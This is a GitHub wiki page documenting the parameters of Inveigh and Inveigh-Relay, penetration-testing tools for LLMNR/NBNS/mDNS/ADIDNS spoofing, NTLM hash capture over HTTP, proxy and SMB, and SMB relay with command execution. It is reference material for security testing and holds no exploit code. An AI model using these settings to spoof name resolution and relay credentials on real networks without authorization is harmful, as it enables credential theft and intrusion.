-
Notifications
You must be signed in to change notification settings - Fork 449
Parameters
Kevin Robertson edited this page Jul 31, 2019
·
36 revisions
To cover as many use cases as possible, Inveigh has a lot of parameters (I’ll admit it’s an obnoxious amount at this point) for tweaking how Inveigh and Inveigh-Relay will run. This section contains a list of all current parameters with brief descriptions.
Parameter | Default | Valid Values | Description |
---|---|---|---|
ADIDNS | Combo, NS, Wildcard | List of ADIDNS spoofing attacks. Combo looks at LLMNR/NBNS requests and adds a record to DNS if the same request is received from multiple systems. NS injects an NS record and if needed, a target record. This is primarily for the GQBL bypass for wpad. This attack can be used with Inveigh's DNS spoofer. Wildcard injects a wildcard record. | |
ADIDNSACE | Y | Y/N | Enable/Disable adding an 'Authenticated Users' full control ACE to any added records. |
ADIDNSCleanup | Y | Y/N | Enable/Disable removing added ADIDNS records upon shutdown. |
ADIDNSCredential | PSCredential object that will be used with ADIDNS spoofing. | ||
ADIDNSDomain | The targeted domain in DNS format. | ||
ADIDNSDomainController | Domain controller to target. This parameter is mandatory on a non-domain attached system. | ||
ADIDNSForest | The targeted forest in DNS format. | ||
ADIDNSHostsIgnore | Comma separated list of hosts that will be ignored with ADIDNS spoofing. | ||
ADIDNSNSTarget | wpad2 | Target for the NS attacks NS record. An existing record can be used. | |
ADIDNSPartition | DomainDNSZones | DomainDNSZones, ForestDNSZones, System | The AD partition name where the zone is stored. |
ADIDNSThreshold | 4 | The threshold used to determine when ADIDNS records are injected for the combo attack. Inveigh will track identical LLMNR and NBNS requests received from multiple systems. DNS records will be injected once the system count for identical LLMNR and NBNS requests exceeds the threshold. | |
ADIDNSTTL | 600 | DNS TTL in seconds for added A records. | |
ADIDNSZone | The ADIDNS zone. | ||
LLMNR | Y | Y/N | Enable/Disable LLMNR spoofer. |
LLMNRTTL | 30 Seconds | LLMNR TTL in seconds for the response packet. | |
mDNS | N | Y/N | Enable/Disable mDNS spoofing. |
mDNSTTL | 120 Seconds | mDNS TTL in seconds for the response packet. | |
mDNSTypes | QU | QU,QM | Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251. |
NBNS | N | Y/N | Enable/Disable NBNS spoofer. |
NBNSTTL | 165 Seconds | NBNS TTL in seconds for the response packet. | |
NBNSTypes | 00,20 | 00,03,20,1B | Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name |
NBNSBruteForce | N | Y/N | Enable/Disable NBNS brute force spoofer. |
NBNSBruteForceHost | WPAD | Hostname for NBNS brute force spoofer. | |
NBNSBruteForcePause | N | Seconds | Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. |
SpooferHostsIgnore | Comma separated list of requested hostnames to ignore when spoofing. | ||
SpooferHostsReply | Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning. | ||
SpooferIP | Local IP | Response IP address for spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. | |
SpooferIPsIgnore | Comma separated list of source IP addresses to ignore when spoofing. | ||
SpooferIPsReply | Comma separated list of source IP addresses to respond to when spoofing. | ||
SpooferLearning | N | Y/N | Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the hostname to a spoofing blacklist. The valid system must respond to the protocol type that matches the protocol of the original request in order to be blacklisted. |
SpooferLearningDelay | Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning. | ||
SpooferLearningInterval | 30 Minutes | Time in minutes that Inveigh will wait before sending out an LLMNR/NBNS request for a hostname that has already been checked through SpooferLearning. | |
SpooferRepeat | Y | Y/N | Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. |
Parameter | Default | Valid Values | Description |
---|---|---|---|
Challenge | 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. | ||
HTTP | Y | Y/N | Enable/Disable HTTP challenge/response capture. |
HTTPAuth | NTLM | Anonymous, Basic, NTLM, NTLMNoESS | HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. |
HTTPBasicRealm | Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. | ||
HTTPContentType | text/html | Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse. | |
HTTPDefaultEXE | EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. | ||
HTTPDefaultFile | Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. | ||
HTTPDirectory | Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. | ||
HTTPIP | 0.0.0.0 | IP address for the HTTP listener. | |
HTTPPort | 80 | TCP port for the HTTP listener. | |
HTTPResetDelayTimeout | 30 Seconds | HTTPResetDelay timeout in seconds. | |
HTTPResponse | String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. | ||
HTTPS | N | Y/N | Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires local administrator access. |
HTTPSCertIssuer | Inveigh | The issuer field for the cert that will be installed for HTTPS. | |
HTTPSCertSubject | localhost | The subject field for the cert that will be installed for HTTPS. | |
HTTPSForceCertDelete | N | Y/N | Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. |
HTTPSPort | 443 | TCP port for the HTTPS listener. | |
Proxy | N | Y/N | Enable/Disable proxy server authentication captures. |
ProxyAuth | NTLM | Basic, NTLM, NTLMNoESS | Proxy server authentication type. |
ProxyIgnore | Firefox | Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening. | |
ProxyIP | 0.0.0.0 | IP address for the proxy listener. | |
ProxyPort | 8492 | TCP port for the proxy listener. | |
WPADAuth | NTLM | Anonymous, Basic, NTLM, NTLMNoESS | HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. |
WPADAuthIgnore | Firefox | Comma separated list of keywords to use for filtering browser user agents. Matching browsers will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login popups for authenticated wpad.dat requests such as Firefox. | |
WPADDirectHosts | Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. | ||
WPADIP | Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. | ||
WPADPort | Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. | ||
WPADResponse | wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. |
Parameter | Default | Valid Values | Description |
---|---|---|---|
ConsoleOutput | N | Low, Medium, Y, N | Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. |
ConsoleQueueLimit | Maximum number of queued up console log entries when not using the real time console. | ||
ConsoleStatus | N | Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. | |
ConsoleUnique | Y | Y/N | Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. |
FileOutput | N | Y/N | Enable/Disable real time file output. |
FileOutputDirectory | Valid path to an output directory for log and capture files. FileOutput must also be enabled. | ||
FileUnique | Y | Y/N | Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. |
LogOutput | Y | Y/N | Enable/Disable storing log messages in memory. |
OutputStreamOnly | N | Y/N | Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. |
Pcap | File, Memory | Enable/Disable dumping packets to a pcap file or memory. This option requires elevated privilege. If using 'Memory', the packets will be written to the $inveigh.pcap ArrayList. | |
PcapTCP | 139, 445 | Comma separated list of TCP ports to filter which packets will be written to the pcap file. Use 'All' to capture on all ports. | |
PcapUDP | Comma separated list of UDP ports to filter which packets will be written to the pcap file. Use 'All' to capture on all ports. | ||
ShowHelp | Y | Y/N | Enable/Disable the help messages at startup. |
StatusOutput | Y | Y/N | Enable/Disable startup and shutdown messages. |
Parameter | Default | Valid Values | Description |
---|---|---|---|
Elevated | Auto | Auto/Y/N | Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used. |
Inspect | Switch to disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. | ||
IP | Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing if the SpooferIP parameter is not set. | ||
MachineAccounts | N | Y/N | Enable/Disable showing NTLM challenge/response captures from machine accounts. |
SMB | Y | Y/N | Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host. |
StartupChecks | Y | Y/N | Enable/Disable checks for in use ports and running services on startup. |
RunCount | Number of NTLMv1/NTLMv2 captures to perform before auto-exiting. | ||
RunTime | Run time duration in minutes. | ||
Tool | 0 | 0/1/2 | Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire |
Parameter | Default | Valid Values | Description |
---|---|---|---|
Attack | Enumerate, Session | Enumerate, Execute, Session | Comma seperated list of attacks to perform with relay. Enumerate leverages relay to perform enumeration on target systems. The collected data is used for target selection. Execute performs PSExec style command execution. Session creates and maintains authenticated SMB sessions that can be interacted with through Invoke-TheHash's Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec. |
Command | Command to execute on SMB relay target. Use PowerShell character escapes where necessary. | ||
DomainMapping | Array to map one netBIOS domain to one DNS domain. Needed when attacking a domain from a non-domain attached system with data imported from BloodHound. | ||
Enumerate | All | All, Group, NetSession, Share, User | The action that will be used for the 'Enumerate' attack. |
EnumerateGroup | Administrators | The group that will be enumerated with the 'Enumerate' attack. Note that only the 'Administrators' group will be used for targeting decisions. | |
FailedLoginStrict | N | Y/N | If disabled, login attempts against non-domain attached will not count as failed logins. If enabled, all failed logins will count. |
FailedLoginThreshold | 2 | The threshold for failed logins. Once failed logins for a user exceed the threshold, further relay attempts for that user will be stopped. | |
RelayAutoDisable | Y | Y/N | Automatically disable SMB relay after a successful command execution on target. |
RelayAutoExit | Y | Y/N | Enable/Disable automatically exiting after a relay is disabled due to success or error. |
RepeatEnumerate | 30 | The minimum number of minutes to wait between enumeration attempts for a target. | |
RepeatExecute | 30 | The minimum number of minutes to wait between command execution attempts for a target. | |
Service | Name of the service to create and delete on the target. | ||
SessionLimitPriv | 2 | Limit of privileged sessions on a target. | |
SessionLimitShare | 2 | Limit of sessions per user for targets hosting custom shares. | |
SessionLimitUnpriv | 0 | Limit of unprivileged sessions on a target. | |
SessionRefresh | 10 | The number of minutes between refreshes to keep sessions from timing out. | |
Target | Comma separated list of IP addresses to target for relay. This parameter will accept single addresses, CIDR, or ranges on the format of 192.168.0.1-192.168.0.10 or 192.168.0.1-10. Avoid using large ranges with lots of unused IP addresses or systems not running SMB. Inveigh-Relay will do quick port checks as part of target selection and filter out invalid targets. Something like a /16 with only a few hosts isn't really practical though. | ||
TargetExclude | Comma separated list of IP addresses to exlude from the target list. This parameter will accept the same formats as the 'Target' parameter. | ||
TargetMode | Random | Random, Strict | 'Random' target mode will fall back to selecting a random target is a match isn't found through enumerated data. 'Strict' will only select targets through enumerated data. Note that 'Strict' requires either previously collected data from the 'Enumerate' attack or data imported from BloodHound. |
TargetRandom | Y | Y/N | Enable/Disable selecting a random target if a target is not found through logic. |
TargetRefresh | 60 | Number of minutes to wait before rechecking a target for eligibility. | |
Username | Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. |
Parameter | Default | Valid Values | Description |
---|---|---|---|
Challenge | 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. | ||
HTTP | Enabled | Y/N | Enable/Disable HTTP challenge/response capture. |
HTTPIP | 0.0.0.0 | IP address for the HTTP/HTTPS listener. | |
HTTPPort | 80 | TCP port for the HTTP listener. | |
HTTPResetDelay | Firefox | Comma separated list of keywords to use for filtering browser user agents. Matching browsers will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the chance of capturing/relaying authentication through a popup box with some browsers (Firefox). | |
HTTPResetDelayTimeout | 30 Seconds | Seconds | HTTPResetDelay timeout in seconds. |
HTTPS | N | Y/N | Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. |
HTTPSCertIssuer | Inveigh | The issuer field for the cert that will be installed for HTTPS. | |
HTTPSCertSubject | localhost | The subject field for the cert that will be installed for HTTPS. | |
HTTPSForceCertDelete | Y | Y/N | Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. |
Proxy | N | Y/N | Enable/Disable proxy server authentication captures. |
ProxyIgnore | Firefox | Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening. | |
ProxyIP | 0.0.0.0 | IP address for the proxy listener. | |
ProxyPort | 8492 | TCP port for the proxy listener. | |
WPADAuth | NTLM | Anonymous, NTLM | HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. |
WPADAuthIgnore | N | Comma separated list of keywords to use for filtering browser user agents. Matching browsers will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login popups for authenticated wpad.dat requests such as Firefox. |
Parameter | Default | Valid Values | Description |
---|---|---|---|
ConsoleOutput | N | Low, Medium, Y, N | Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. |
ConsoleQueueLimit | Maximum number of queued up console log entries when not using the real time console. | ||
ConsoleStatus | N | Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. | |
ConsoleUnique | Y | Y/N | Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. |
FileOutput | N | Y/N | Enable/Disable real time file output. |
FileOutputDirectory | Working Directory | Valid path to an output directory for log and capture files. FileOutput must also be enabled. | |
LogOutput | Y | Y/N | Enable/Disable storing log messages in memory. |
OutputStreamOnly | Disabled | Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. | |
ShowHelp | Y | Y/N | Enable/Disable the help messages at startup. |
StatusOutput | Y | Y/N | Enable/Disable startup and shutdown messages. |
Parameter | Default | Valid Values | Description |
---|---|---|---|
MachineAccounts | N | Y/N | Enable/Disable showing NTLM challenge/response captures from machine accounts. |
RunTime | Run time duration in minutes. | ||
Tool | 0 | 0,1,2 | Set features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire |